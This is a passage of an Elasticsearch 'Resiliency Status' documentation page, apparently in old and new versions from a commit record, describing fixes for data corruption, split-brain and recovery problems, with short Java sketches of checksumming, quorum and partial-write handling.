simulated the bug described in issue 2488. You can take a look at the https:\/\/github.com\/elasticsearch\/elasticsearch\/commit\/7bf3ffe73c44f1208d1f7a78b0629eb48836e726[original commit] of a reproduction on master. (STATUS: DONE, v1.2.0)\n* The bug described in {GIT}2488[issue 2488] is caused by an issue in our Zen discovery gossip protocol. This specific issue has been fixed, and work has been done to make the algorithm more resilient. (STATUS: DONE, v1.4.0.Beta1)\n\n[float]\n=== Translog Entry Checksum (STATUS: DONE, v1.4.0.Beta1)\n\nEach translog entry in Elasticsearch should have its own checksum, and potentially additional information, so that we can properly detect corrupted translog entries and act accordingly. You can find more detail in issue {GIT}6554[#6554].\n\nTo start, we will begin by adding checksums to the translog to detect corrupt entries. Once this work has been completed, we will add translog entry markers so that corrupt entries can be skipped in the translog if\/when desired.\n\n[float]\n=== Request-Level Memory Circuit Breaker (STATUS: DONE, v1.4.0.Beta1)\n\nWe are in the process of introducing multiple circuit breakers in Elasticsearch, which can \u201cborrow\u201d space from each other in the event that one runs out of memory. This architecture allows limits for certain parts of memory while still allowing flexibility in the event that another reserve, like field data, is not being used. This change includes adding a breaker for the BigArrays internal object used for some aggregations. See issue {GIT}6739[#6739] for more details.\n\n[float]\n=== Doc Values (STATUS: DONE, v1.4.0.Beta1)\n\nFielddata is one of the largest consumers of heap memory, and thus one of the primary reasons for running out of memory and causing node instability. Elasticsearch has had the \u201cdoc values\u201d option for a while, which allows you to build these structures at index time so that they live on disk instead of in memory. 
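\n\nAs a minimal sketch of how the option is turned on (index, type, and field names are illustrative, assuming a 1.x-style mapping):\n\n[source,js]\n--------------------------------------------------\nPUT my-index\n{\n \"mappings\": {\n \"my_type\": {\n \"properties\": {\n \"timestamp\": { \"type\": \"date\", \"doc_values\": true }\n }\n }\n }\n}\n--------------------------------------------------\n\n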
\n\nBy benchmarking and profiling both Lucene and Elasticsearch, we identified the bottlenecks and made a series of changes to improve the performance of doc values. They are now almost as fast as the in-memory option.\n\nSee {GIT}6967[#6967], {GIT}6908[#6908], {GIT}4548[#4548], {GIT}3829[#3829], {GIT}4518[#4518], {GIT}5669[#5669], {JIRA}5748[LUCENE-5748], {JIRA}5703[LUCENE-5703], {JIRA}5750[LUCENE-5750], {JIRA}5721[LUCENE-5721], {JIRA}5799[LUCENE-5799].\n\n[float]\n=== Index corruption when upgrading Lucene 3.x indices (STATUS: DONE, v1.4.0.Beta1)\n\nUpgrading indices created with Lucene 3.x (Elasticsearch v0.20 and before) to Lucene 4.7 - 4.9 (Elasticsearch 1.1.0 to 1.3.x) could result in index corruption. {JIRA}5907[LUCENE-5907] fixes this issue in Lucene 4.10.\n\n[float]\n=== Improve error handling when deleting files (STATUS: DONE, v1.4.0.Beta1)\n\nLucene uses reference counting to prevent files that are still in use from being deleted. Lucene testing discovered a bug ({JIRA}5919[LUCENE-5919]) when decrementing the ref count on a batch of files. If deleting some of the files resulted in an exception (e.g. due to interference from a virus scanner), the files that had had their ref counts decremented successfully could later have their ref counts decremented again, incorrectly, resulting in files being physically deleted before their time. This is fixed in Lucene 4.10.\n\n[float]\n=== Using Lucene Checksums to verify shards during snapshot\/restore (STATUS: DONE, v1.3.3)\n\nThe snapshot process should verify checksums for each file that is being snapshotted to make sure that the created snapshot doesn\u2019t contain corrupted files. If a corrupted file is detected, the snapshot should fail with an error. In order to implement this feature we need to have correct and verifiable checksums stored with segment files, which is only possible for files that were written by the officially supported append-only codecs. See {GIT}7159[#7159].\n\n[float]\n=== Rare compression corruption during shard recovery (STATUS: DONE, v1.3.2)\n\nDuring recovery, the primary shard is copied over the network to become a new replica shard. In rare cases, it was possible for a hash collision to trigger a bug in the compression library we use, producing corruption in the replica shard. This bug was exposed by the change to validate checksums during recovery. We tracked down the bug in the compression library and submitted a patch, which was accepted and merged by the upstream project. See {GIT}7210[#7210].\n\n[float]\n=== Safer recovery of replica shards (STATUS: DONE, v1.3.0)\n\nIf a primary shard fails or is closed while a replica is using it for recovery, we need to ensure that the replica is properly failed as well, and allow recovery to start from the new primary. Also check that an active copy of a shard is available on another node before physically removing an inactive shard from disk. {GIT}6825[#6825], {GIT}6645[#6645], {GIT}6995[#6995].\n\n[float]\n=== Using Lucene Checksums to verify shards during recovery (STATUS: DONE, v1.3.0)\n\nElasticsearch can use Lucene checksums to validate files while {GIT}6776[recovering a replica shard from a primary].\n\nThis issue exposed a bug in Elasticsearch\u2019s handling of primary shard failure when there are more than two replicas, causing the second replica to not be properly unassigned if it is in the middle of recovery. It was fixed with the merge of issue {GIT}6808[#6808].
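For reference, verifying a single file end to end is a thin wrapper around Lucene's CodecUtil, available since Lucene 4.8; a sketch:

[source,java]
----
import java.io.IOException;
import org.apache.lucene.codecs.CodecUtil;
import org.apache.lucene.store.Directory;
import org.apache.lucene.store.IOContext;
import org.apache.lucene.store.IndexInput;

public class ChecksumVerifySketch {
    // Reads the whole file and compares the computed checksum against the
    // value stored in its footer; throws CorruptIndexException on mismatch.
    static long verify(Directory dir, String fileName) throws IOException {
        try (IndexInput in = dir.openInput(fileName, IOContext.READONCE)) {
            return CodecUtil.checksumEntireFile(in);
        }
    }
}
----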
\n\nIn order to verify the checksumming mechanism, we added functionality to our testing infrastructure that can corrupt an arbitrary index file at any point, such as while it\u2019s traveling over the wire or residing on disk. The tests utilizing this feature expect full or partial recovery from the failure while neither losing data nor spreading the corruption.\n\n[float]\n=== Detect File Corruption (STATUS: DONE, v1.3.0)\n\nIf a checksum failure reveals index corruption during merging or refresh, Elasticsearch will fail the shard. You can read the full details in pull request {GIT}6776[#6776].\n\n[float]\n=== Network disconnect events could be lost, causing a zombie node to stay in the cluster state (STATUS: DONE, v1.3.0)\n\nPreviously, there was a very short window in which we could lose a node disconnect event. To prevent this from occurring, we added extra handling of connection errors to our node & master fault detection pinging to make sure the node disconnect event is detected. See issue {GIT}6686[#6686].\n\n[float]\n=== Other fixes to Lucene to address resiliency (STATUS: DONE, v1.3.0)\n\n* NativeLock is released if Lock is closed after failing on obtain {JIRA}5738[LUCENE-5738].\n* NRT Reader close can wipe an index it doesn\u2019t own. {JIRA}5574[LUCENE-5574]\n* FSDirectory\u2019s fsync() was lenient; it now throws exceptions when errors occur {JIRA}5570[LUCENE-5570]\n* fsync() directory when committing {JIRA}5588[LUCENE-5588]\n\n[float]\n=== Backwards Compatibility Testing (STATUS: DONE, v1.3.0)\n\nSince founding Elasticsearch Inc., we grew our test base from ~1k tests to about 4k in just over a year. We invested massively into our testing infrastructure, running our tests continuously on different operating systems, bare metal hardware and cloud environments, all while randomizing JVMs and their settings.\n\nYet, backwards compatibility testing was a very manual thing until we shipped a pretty {GIT}6393[insane bug] in Elasticsearch 1.2. We tried to fix places where the absolute value of a number was negative (a documented behavior of Math.abs(int) in Java when the input is Integer.MIN_VALUE) and missed that the fix for this also changed the result of our routing function. No matter how much randomization we applied to the tests, we didn\u2019t catch this particular failure. We always had backwards compatibility tests on our list of things to do, but didn\u2019t have them in place back then.\n\nWe recently tweaked our testing infrastructure to be able to run tests against a hybrid cluster composed of a released version of Elasticsearch and our current stable branch. This test pattern allowed us to mimic typical upgrade scenarios like rolling upgrades, index backwards compatibility and recovering from old to new nodes.\n\nNow, even the simplest test that relies on routing fails against 1.2.0, which is exactly what we were aiming for. The test would not have caught the aforementioned {GIT}6393[routing bug] before releasing 1.2.0, but it immediately saved us from {GIT}6660[another problem] in the stable branch.\n\nThe work on our testing infrastructure is more than just issue prevention; it allows us to develop and test upgrade paths, introduce new features and evolve indexing over time. It isn\u2019t enough to introduce more resilient implementations; we also have to ensure that users take advantage of them when they upgrade.\n\nYou can read more about backwards compatibility tests in issue {GIT}6497[#6497].
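To make the failure mode concrete: Math.abs(Integer.MIN_VALUE) returns Integer.MIN_VALUE, so naively taking the absolute value of a hash can still yield a negative shard index, and changing how that case is handled changes where existing documents route. A sketch of the general technique (not the actual Elasticsearch routing code):

[source,java]
----
public class RoutingSketch {
    // Math.abs(int) cannot represent |Integer.MIN_VALUE|, so it returns the
    // negative input unchanged. "Fixing" call sites like this silently moves
    // documents to different shards - a routing-compatibility break.
    static int shardId(int hash, int numberOfShards) {
        return (hash & 0x7fffffff) % numberOfShards; // mask the sign bit instead
    }

    public static void main(String[] args) {
        System.out.println(Math.abs(Integer.MIN_VALUE));    // prints -2147483648
        System.out.println(shardId(Integer.MIN_VALUE, 5));  // safe: 0..4
    }
}
----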
\n\n[float]\n=== Full Translog Writes on all Platforms (STATUS: DONE, v1.2.2 and v1.3.0)\n\nWe have recently received bug reports of transaction log corruption that can occur when indexing very large documents (in the area of 300 KB). Although some Linux users reported this behavior, it appears the problem occurs more frequently when running Windows. We traced the source of the problem to the fact that when serializing documents to the transaction log, the operating system can write only part of the document before returning from the write call. We can now detect this situation and make sure that the entire document is properly written. You can read the full details in pull request {GIT}6576[#6576].
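The underlying contract is easy to miss: a single FileChannel.write call may write fewer bytes than the buffer contains. The defensive pattern is a drain loop along these lines (a sketch of the idea behind the fix, not the literal patch):

[source,java]
----
import java.io.IOException;
import java.nio.ByteBuffer;
import java.nio.channels.FileChannel;

public class TranslogWriteSketch {
    // write() is allowed to perform a partial write; loop until the buffer
    // is fully drained so a large entry is never half-persisted.
    static void writeFully(FileChannel channel, ByteBuffer buffer) throws IOException {
        while (buffer.hasRemaining()) {
            channel.write(buffer);
        }
    }
}
----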
\n\n[float]\n=== Lucene Checksums (STATUS: DONE, v1.2.0)\n\nBefore Apache Lucene version 4.8, checksums were not computed on generated index files. The result was that it was difficult to identify when or if a Lucene index got corrupted, whether by hardware failure, JVM bug or for an entirely different reason.\n\nFor an idea of the checksum efforts in progress in Apache Lucene, see issues {JIRA}2446[LUCENE-2446], {JIRA}5580[LUCENE-5580] and {JIRA}5602[LUCENE-5602]. The gist is that Lucene 4.8+ now computes full checksums on all index files and it verifies them when opening metadata or other smaller files as well as other files during merges.\n\n[float]\n=== Detect errors faster by locally failing a shard upon an indexing error (STATUS: DONE, v1.2.0)\n\nPreviously, Elasticsearch notified the master of the shard failure and waited for the master to close the local copy of the shard, thus assigning it to other nodes. This architecture caused delays in failure detection, potentially causing unneeded failures of other incoming requests. In rare cases, such as concurrency race conditions or certain network partition configurations, we could lose these failure notifications. We solved this issue by locally failing shards upon indexing errors. See issue {GIT}5847[#5847].\n\n[float]\n=== Snapshot\/Restore API (STATUS: DONE, v1.0.0)\n\nIn Elasticsearch version 1.0, we significantly improved the backup process by introducing the Snapshot\/Restore API. While it was always possible to make backups of Elasticsearch, the Snapshot\/Restore API made the backup process much easier.\n\nThe backup process is incremental, making it very efficient since only files changed since the last backup are copied. Even with this efficiency introduced, each snapshot contains a full picture of the cluster at the moment the backup started. The restore API allows speedy recovery of a full cluster as well as selected indices.\n\nSince that first release in version 1.0, the API has continued to evolve. In version 1.1.0, we added a new snapshot status API that allows users to monitor the snapshot process. In 1.3.0 we added the ability to {GIT}6457[restore indices without their aliases] and in 1.4 we are planning to add the ability to {GIT}6368[restore partial snapshots].\n\nThe Snapshot\/Restore API supports a number of different repository types for storing backups. Currently, it\u2019s possible to make backups to a shared file system, Amazon S3, HDFS, and Azure storage. We are continuing to work on adding other types of storage systems, as well as improving the robustness of the snapshot\/restore process.\n\n[float]\n=== Circuit Breaker: Fielddata (STATUS: DONE, v1.0.0)\n\nCurrently, the http:\/\/www.elasticsearch.org\/guide\/en\/elasticsearch\/reference\/current\/index-modules-fielddata.html[circuit breaker] protects against loading too much field data by estimating how much memory the field data will take to load, then aborting the request if the memory requirements are too high. This feature was added in Elasticsearch version 1.0.0.\n\n[float]\n=== Use of Paginated Data Structures to Ease Garbage Collection (STATUS: DONE, v1.0.0 & v1.2.0)\n\nElasticsearch has moved from an object-based cache to a page-based cache recycler as described in issue {GIT}4557[#4557]. This change makes garbage collection easier by limiting fragmentation, since all pages have the same size and are recycled. It also allows managing the size of the cache not based on the number of objects it contains, but on the memory that it uses.\n\nThese pages are used for two main purposes: implementing higher-level data structures such as hash tables, used internally by aggregations to, for example, map terms to counts, as well as reusing memory in the translog\/transport layer as detailed in issue {GIT}5691[#5691].\n\n[float]\n=== Dedicated Master Nodes Resiliency (STATUS: DONE, v1.0.0)\n\nIn order to run a more resilient cluster, we recommend running dedicated master nodes to ensure master nodes are not affected by resources consumed by data nodes. We have also made master nodes more resilient to heavy resource usage, mainly associated with large clusters \/ cluster states.\n\nThese changes include:\n\n* Improve the balancing algorithm to execute faster across large clusters \/ many indices. (See issue {GIT}4458[#4458] and {GIT}4459[#4459])\n* Improve cluster state publishing to not create an additional network buffer per node. (More in https:\/\/github.com\/elasticsearch\/elasticsearch\/commit\/a9e259d438c3cb1d3bef757db2d2a91cf85be609[this commit].)\n* Improve master handling of large scale mapping updates from data nodes by batching them into a single cluster event. (See issue {GIT}4373[#4373].)\n* Add an ack mechanism where next phase cluster updates are processed only when nodes acknowledged they received the previous cluster state. (See issues {GIT}3736[#3736], {GIT}3786[#3786], {GIT}4114[#4114], {GIT}4169[#4169], {GIT}4228[#4228] and {GIT}4421[#4421], which also include enhancements to the ack mechanism implementation.)\n\n[float]\n=== Multi Data Paths May Falsely Report Corrupt Index (STATUS: DONE, v1.0.0)\n\nWhen using multiple data paths, an index could be falsely reported as corrupted. This has been fixed with pull request {GIT}4674[#4674].\n\n[float]\n=== Randomized Testing (STATUS: DONE, v1.0.0)\n\nIn order to best validate resiliency in Elasticsearch, we rewrote the Elasticsearch test infrastructure to introduce the concept of http:\/\/berlinbuzzwords.de\/sites\/berlinbuzzwords.de\/files\/media\/documents\/dawidweiss-randomizedtesting-pub.pdf[randomized testing]. Randomized testing allows us to easily enhance the Elasticsearch testing infrastructure with predictably irrational conditions, making the resulting code base more resilient.\n\nEach of our integration tests runs against a cluster with a random number of nodes, and indices have a random number of shards and replicas. Merge settings change for every run; indexing is done serially or asynchronously, or even wrapped in a bulk operation; and thread pool sizes vary to ensure that we don\u2019t produce a deadlock no matter what happens. The list of places where we use this randomization infrastructure is long and growing every day, and it has saved us headaches several times before we shipped a particular feature.
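A toy version of the reproducibility trick at the heart of this: derive every random choice from one printed seed so a failing configuration can be replayed exactly. (The real infrastructure is built on the RandomizedTesting framework and is considerably richer; the property name here is illustrative.)

[source,java]
----
import java.util.Random;

public class RandomizedClusterTestSketch {
    public static void main(String[] args) {
        // Take the seed from a system property so a failing run can be
        // replayed exactly: -Dtests.seed=<printed value>
        long seed = Long.getLong("tests.seed", System.nanoTime());
        System.out.println("tests.seed=" + seed);
        Random random = new Random(seed);

        int nodes = 1 + random.nextInt(5);    // random cluster size
        int shards = 1 + random.nextInt(5);   // random primary shard count
        int replicas = random.nextInt(3);     // random replica count
        boolean bulk = random.nextBoolean();  // index via bulk or not
        System.out.printf("nodes=%d shards=%d replicas=%d bulk=%b%n",
                nodes, shards, replicas, bulk);
        // ... start cluster, index documents, assert invariants ...
    }
}
----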
\n\nAt Elasticsearch, we live the philosophy that we can miss a bug once, but never a second time. We make our tests more evil as we go, introducing randomness in all the areas where we discovered bugs. We figure if our tests don\u2019t fail, we are not trying hard enough! If you are interested in how we have evolved our test infrastructure over time, check out https:\/\/github.com\/elasticsearch\/elasticsearch\/issues?q=label%3Atest[issues labeled with ``test'' on GitHub].\n\n[float]\n=== Lucene Loses Data On File Descriptors Failure (STATUS: DONE, v0.90.0)\n\nWhen a process runs out of file descriptors, Lucene can cause an index to be completely deleted. This issue was fixed in Lucene ({JIRA}4870[version 4.2.1]) and the fix was included in an early version of Elasticsearch. See issue {GIT}2812[#2812].\n\n","old_contents":"= Resiliency Status\n\n:JIRA: https:\/\/issues.apache.org\/jira\/browse\/LUCENE-\n:GIT: https:\/\/github.com\/elasticsearch\/elasticsearch\/issues\/\n\n== Overview\n\nThe team at Elasticsearch is committed to continuously improving both\nElasticsearch and Apache Lucene to protect your data. As with any distributed\nsystem, Elasticsearch is complex and has many moving parts, each of which can\nencounter edge cases that require proper handling. Our resiliency project is\nan ongoing effort to find and fix these edge cases. If you want to keep up\nwith this project on GitHub, see our issues list under the tag\nhttps:\/\/github.com\/elasticsearch\/elasticsearch\/issues?q=label%3Aresiliency[resiliency].\n\nWhile GitHub is great for sharing our work, it can be difficult to get an\noverview of the current state of affairs and the previous work that has been\ndone from an issues list. This page provides an overview of all the\nresiliency-related issues that we are aware of, improvements that have already\nbeen made and current in-progress work. We\u2019ve also listed some historical\nimprovements throughout this page to provide the full context.\n\nIf you\u2019re interested in more on how we approach ensuring resiliency in\nElasticsearch, you may be interested in Igor Motov\u2019s recent talk\nhttp:\/\/www.elasticsearch.org\/videos\/improving-elasticsearch-resiliency\/[Improving Elasticsearch Resiliency].\n\nYou may also be interested in our blog post\nhttp:\/\/www.elasticsearch.org\/blog\/resiliency-elasticsearch\/[Resiliency in Elasticsearch],\nwhich details our thought processes when addressing resiliency, both in\nElasticsearch and in the work our developers do upstream in Apache Lucene.\n\n== Data Store Recommendations\n\nSome customers use Elasticsearch as a primary datastore, some set up\ncomprehensive backup solutions using features such as our Snapshot and\nRestore, while others use Elasticsearch in conjunction with a data storage\nsystem like Hadoop or even flat files. Elasticsearch can be used for so many\ndifferent use cases, which is why we have created this page to make sure you\nare fully informed when you are architecting your system.\n\n== Work in Progress\n\n[float]\n=== Known Unknowns (STATUS: ONGOING)\n\nWe consider this topic to be the most important in our quest for\nresiliency.
We put a tremendous amount of effort into testing\nElasticsearch to simulate failures and randomize configuration to\nproduce extreme conditions. In addition, our users are an important\nsource of information on unexpected edge cases and your bug reports\nhelp us make fixes that ensure that our system continues to be\nresilient.\n\nIf you encounter an issue, https:\/\/github.com\/elasticsearch\/elasticsearch\/issues[please report it]!\n\nWe are committed to tracking down and fixing all the issues that are posted.\n\n[float]\n=== Loss of documents during network partition (STATUS: ONGOING)\n\nIf a network partition separates a node from the master, there is some window of time before the node detects it. The length of the window is dependent on the type of the partition. This window is extremely small if a socket is broken. More adversarial partitions, such as those that silently drop requests without breaking the socket, can take longer to detect (up to 3x30s using current defaults).\n\nIf the node hosts a primary shard at the moment of partition, and ends up being isolated from the cluster (which could have resulted in {GIT}2488[split-brain] before), some documents that are being indexed into the primary may be lost if they fail to reach one of the allocated replicas (due to the partition) and that replica is later promoted to primary by the master. {GIT}7572[#7572]\n\nA test to replicate this condition was added in {GIT}7493[#7493].\n\n[float]\n=== Prevent use of known-bad Java versions (STATUS: ONGOING)\n\nCertain versions of the JVM are known to have bugs which can cause index corruption. {GIT}7580[#7580] prevents Elasticsearch startup if known bad versions are in use.\n\n[float]\n=== Lucene checksums phase 2 (STATUS: ONGOING)\n\nWhen Lucene opens a segment for reading, it validates the checksum on the smaller segment files -- those which it reads entirely into memory -- but not the large files like term frequencies and positions, as this would be very expensive. During merges, term vectors and stored fields are validated, as long as the segments being merged come from the same version of Lucene. Checksumming for term vectors and stored fields is important because merging consists of performing optimized byte copies. Term frequencies, term positions, payloads, doc values, and norms are currently not checked during merges, although Lucene provides the option to do so. These files are less prone to silent corruption as they are actively decoded during merge, and so are more likely to throw exceptions if there is any corruption.\n\nThere are a few ongoing efforts to improve coverage:\n\n* {GIT}7360[#7360] validates checksums on all segment files during merges. (STATUS: DONE, fixed in 1.4.0.Beta1)\n* {JIRA}5842[LUCENE-5842] validates the structure of the checksum footer of the postings lists, doc values, stored fields and term vectors when opening a new segment, to ensure that these files have not been truncated. (STATUS: DONE, Fixed in Lucene 4.10 and 1.4.0.Beta1)\n* {JIRA}5894[LUCENE-5894] lays the groundwork for extending more efficient checksum validation to all files during optimized bulk merges, if possible. (STATUS: ONGOING, Fixed in Lucene 5.0)\n* {GIT}7586[#7586] adds checksums for cluster and index state files. (STATUS: ONGOING, fixed in 1.5.0)\n\n[float]\n=== Add per-segment and per-commit ID to help replication (STATUS: ONGOING)\n\n{JIRA}5895[LUCENE-5895] adds a unique ID for each segment and each commit point. File-based replication (as performed by snapshot\/restore) can use this ID to know whether the segment\/commit on the source and destination machines is the same. Fixed in Lucene 5.0.
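To illustrate the idea only (this is a sketch, not the LUCENE-5895 implementation): attach a random 128-bit identifier to each commit, and let replication treat matching identifiers, rather than matching length and checksum alone, as proof that two copies are the same:

[source,java]
----
import java.security.SecureRandom;
import java.util.Arrays;

// Sketch: a random 128-bit identifier written with each commit. Two copies
// with equal name/length/checksum but different commit IDs are treated as
// different, sidestepping hash-collision false positives.
final class CommitIdSketch {
    private static final SecureRandom RANDOM = new SecureRandom();
    final byte[] id;

    CommitIdSketch() {
        this.id = new byte[16];
        RANDOM.nextBytes(this.id);
    }

    boolean sameAs(byte[] remoteId) {
        return Arrays.equals(id, remoteId); // reuse files only on a match
    }
}
----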
\n\n[float]\n=== Improving Zen Discovery (STATUS: ONGOING)\n\nRecovery from failure is a complicated process, especially in an asynchronous distributed system like Elasticsearch. With several processes happening in parallel, it is important to ensure that recovery proceeds swiftly and safely. While fixing the {GIT}2488[split-brain issue], we have been hunting down corner cases that were not handled optimally, adding tests to demonstrate the issues, and working on fixes:\n\n* Faster & better detection of master & node failures, including not trying to reconnect upon disconnect, failing on disconnect errors during pings, and verifying cluster names in pings. Previously, Elasticsearch had to wait a bit for the node to complete the process required to join the cluster. Recent changes guarantee that a node has fully joined the cluster before we start the fault detection process. Therefore we can do an immediate check, enabling faster detection of errors and validation of the cluster state after a minimum master node breach. {GIT}6706[#6706], {GIT}7399[#7399] (STATUS: DONE, v1.4.0.Beta1)\n* Broaden unicast pinging when the master fails: When a node loses its current master, it will start pinging to find a new one. Previously, when using unicast-based pinging, the node would ping a set of predefined nodes, asking them whether the master had really disappeared or whether there was a network hiccup. Now, we ping all nodes in the cluster to increase coverage. In the case that all unicast hosts are disconnected from the current master during a network failure, this improvement is essential to allow the cluster to reform once the partition is healed. {GIT}7336[#7336] (STATUS: DONE, v1.4.0.Beta1)\n* After joining a cluster, validate that the join was successful and that the master has been set in the local cluster state. {GIT}6969[#6969]. (STATUS: DONE, v1.4.0.Beta1)\n* Write additional tests that use the test infrastructure to verify proper behavior during network disconnections and garbage collections. {GIT}7082[#7082] (STATUS: ONGOING)\n* Make write calls return the number of total\/successful\/missing shards in the same way that we do in search, which ensures transparency in the consistency of write operations. {GIT}7572[#7572]. (STATUS: ONGOING)\n\n[float]\n=== Validate quorum before accepting a write request (STATUS: ONGOING)\n\nToday, when a node holding a primary shard receives an index request, it checks the local cluster state to see whether a quorum of shard copies is available before it accepts the request. However, it can take some time before an unresponsive node is removed from the cluster state. We are adding an optional live check, where the primary node tries to contact its replicas to confirm that they are still responding before accepting any changes. See {GIT}6937[#6937].\n\nWhile that work is ongoing, we tightened the current checks by bringing them closer to the index code. See {GIT}7873[#7873] (STATUS: DONE, fixed in 1.4.0)\n\n[float]\n=== Jepsen Test Failures (STATUS: ONGOING)\n\nWe have increased our test coverage to include scenarios tested by Jepsen. We make heavy use of randomization to expand on the scenarios that can be tested and to introduce new error conditions.
You can follow the work on the master branch of the https:\/\/github.com\/elasticsearch\/elasticsearch\/blob\/master\/src\/test\/java\/org\/elasticsearch\/discovery\/DiscoveryWithServiceDisruptions.java[`DiscoveryWithServiceDisruptions` class], where we will add more tests as time progresses.\n\n[float]\n=== Document guarantees and handling of failure (STATUS: ONGOING)\n\nThis status page is a start, but we can do a better job of explicitly documenting the processes at work in Elasticsearch, and what happens in the case of each type of failure. The plan is to have a test case that validates each behavior under simulated conditions. Every test will document the expected results, the associated test code and an explicit PASS or FAIL status for each simulated case.\n\n[float]\n=== Add a minimum weight to filter cache entries (STATUS: ONGOING)\n\nCommonly used filters are cached in Elasticsearch. That cache is limited in size (10% of node's memory by default) and entries are evicted based on a least-recently-used policy. The amount of memory used by the cache depends on two primary components - the values it stores and the keys associated with them. Calculating the memory footprint of the values is easy enough, but accounting for the keys is trickier because they are, by default, raw Lucene objects. This is largely not a problem as the keys are dominated by the values. However, recent optimizations in Lucene have changed the balance, causing the filter cache to grow beyond its configured size.\n\nWhile we are working on a longer-term solution, we introduced a minimum weight of 1k for each cache entry. This puts an effective limit on the number of entries in the cache. See {GIT}8304[#8304] (STATUS: DONE, fixed in 1.4.0)\n\n== Completed\n\n[float]\n=== Don't allow unsupported codecs (STATUS: DONE, v1.4.0.Beta1)\n\nLucene 4 added a number of alternative codecs for experimentation purposes, and Elasticsearch exposed the ability to change codecs. Since then, Lucene has settled on the best choice of codec and provides backwards compatibility only for the default codec. {GIT}7566[#7566] removes the ability to set alternate codecs.\n\n[float]\n=== Use checksums to identify entire segments (STATUS: DONE, v1.4.0.Beta1)\n\nA hash collision makes it possible for two different files to have the same length and the same checksum. Instead, a segment's identity should rely on checksums from all of the files in a single segment, which greatly reduces the chance of a collision. This change has been merged ({GIT}7351[#7351]).\n\n[float]\n=== Fix ''Split Brain can occur even with minimum_master_nodes'' (STATUS: DONE, v1.4.0.Beta1)\n\nEven when minimum_master_nodes is set, split brain can still occur under certain conditions, e.g. disconnections between master-eligible nodes, which can lead to data loss. The scenario is described in detail in {GIT}2488[issue 2488]:\n\n* Introduced a new testing infrastructure to simulate different types of node disconnections, including loss of network connection, lost messages, message delays, etc. See {GIT}5631[MockTransportService] support and {GIT}6505[service disruption] for more details. (STATUS: DONE, v1.4.0.Beta1).\n* Added tests that simulate the bug described in issue 2488. You can take a look at the https:\/\/github.com\/elasticsearch\/elasticsearch\/commit\/7bf3ffe73c44f1208d1f7a78b0629eb48836e726[original commit] of a reproduction on master. (STATUS: DONE, v1.2.0)\n* The bug described in {GIT}2488[issue 2488] is caused by an issue in our zen discovery gossip protocol. This specific issue has been fixed, and work has been done to make the algorithm more resilient. (STATUS: DONE, v1.4.0.Beta1)
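The operational counterpart of this fix is unchanged: minimum_master_nodes should always be a strict majority of the master-eligible nodes. A provisioning script might compute it as in this sketch:

[source,java]
----
public class QuorumSketch {
    // Majority quorum for N master-eligible nodes: floor(N / 2) + 1.
    // e.g. 3 eligible nodes -> 2, 5 -> 3. A network partition can then
    // contain at most one side holding a quorum, which is what prevents
    // two masters from being elected at once.
    static int minimumMasterNodes(int masterEligibleNodes) {
        return masterEligibleNodes / 2 + 1;
    }

    public static void main(String[] args) {
        System.out.println(minimumMasterNodes(3)); // 2
        System.out.println(minimumMasterNodes(5)); // 3
    }
}
----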
\n\n[float]\n=== Translog Entry Checksum (STATUS: DONE, v1.4.0.Beta1)\n\nEach translog entry in Elasticsearch should have its own checksum, and potentially additional information, so that we can properly detect corrupted translog entries and act accordingly. You can find more detail in issue {GIT}6554[#6554].\n\nTo start, we will add checksums to the translog to detect corrupt entries. Once this work has been completed, we will add translog entry markers so that corrupt entries can be skipped in the translog if\/when desired.\n\n[float]\n=== Request-Level Memory Circuit Breaker (STATUS: DONE, v1.4.0.Beta1)\n\nWe are in the process of introducing multiple circuit breakers in Elasticsearch, which can \u201cborrow\u201d space from each other in the event that one runs out of memory. This architecture will allow limits for certain parts of memory, but still allows flexibility in the event that another reserve, like field data, is not being used. This change includes adding a breaker for the BigArrays internal object used for some aggregations. See issue {GIT}6739[#6739] for more details.\n\n[float]\n=== Doc Values (STATUS: DONE, v1.4.0.Beta1)\n\nFielddata is one of the largest consumers of heap memory, and thus one of the primary reasons for running out of memory and causing node instability. Elasticsearch has had the \u201cdoc values\u201d option for a while, which allows you to build these structures at index time so that they live on disk instead of in memory. Up until recently, doc values were significantly slower than in-memory fielddata.\n\nBy benchmarking and profiling both Lucene and Elasticsearch, we identified the bottlenecks and made a series of changes to improve the performance of doc values. They are now almost as fast as the in-memory option.\n\nSee {GIT}6967[#6967], {GIT}6908[#6908], {GIT}4548[#4548], {GIT}3829[#3829], {GIT}4518[#4518], {GIT}5669[#5669], {JIRA}5748[LUCENE-5748], {JIRA}5703[LUCENE-5703], {JIRA}5750[LUCENE-5750], {JIRA}5721[LUCENE-5721], {JIRA}5799[LUCENE-5799].\n\n[float]\n=== Index corruption when upgrading Lucene 3.x indices (STATUS: DONE, v1.4.0.Beta1)\n\nUpgrading indices created with Lucene 3.x (Elasticsearch v0.20 and before) to Lucene 4.7 - 4.9 (Elasticsearch 1.1.0 to 1.3.x) could result in index corruption. {JIRA}5907[LUCENE-5907] fixes this issue in Lucene 4.10.\n\n[float]\n=== Improve error handling when deleting files (STATUS: DONE, v1.4.0.Beta1)\n\nLucene uses reference counting to prevent files that are still in use from being deleted. Lucene testing discovered a bug ({JIRA}5919[LUCENE-5919]) when decrementing the ref count on a batch of files. If deleting some of the files resulted in an exception (e.g. due to interference from a virus scanner), the files that had had their ref counts decremented successfully could later have their ref counts decremented again, incorrectly, resulting in files being physically deleted before their time. This is fixed in Lucene 4.10.\n\n[float]\n=== Using Lucene Checksums to verify shards during snapshot\/restore (STATUS: DONE, v1.3.3)\n\nThe snapshot process should verify checksums for each file that is being snapshotted to make sure that the created snapshot doesn\u2019t contain corrupted files. If a corrupted file is detected, the snapshot should fail with an error. In order to implement this feature we need to have correct and verifiable checksums stored with segment files, which is only possible for files that were written by the officially supported append-only codecs. See {GIT}7159[#7159].
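Circling back to the Translog Entry Checksum item above, the framing idea is straightforward; one possible layout, sketched with java.util.zip.CRC32 (illustrative, not the actual translog format):

[source,java]
----
import java.io.ByteArrayOutputStream;
import java.io.DataOutputStream;
import java.io.IOException;
import java.util.zip.CRC32;

public class TranslogFrameSketch {
    // Frame each operation as [length][crc32][payload] so a torn or
    // corrupted entry is detected on replay and can be skipped rather
    // than applied.
    static byte[] frame(byte[] payload) throws IOException {
        CRC32 crc = new CRC32();
        crc.update(payload, 0, payload.length);
        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        DataOutputStream out = new DataOutputStream(bytes);
        out.writeInt(payload.length);
        out.writeLong(crc.getValue());
        out.write(payload);
        return bytes.toByteArray();
    }
}
----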
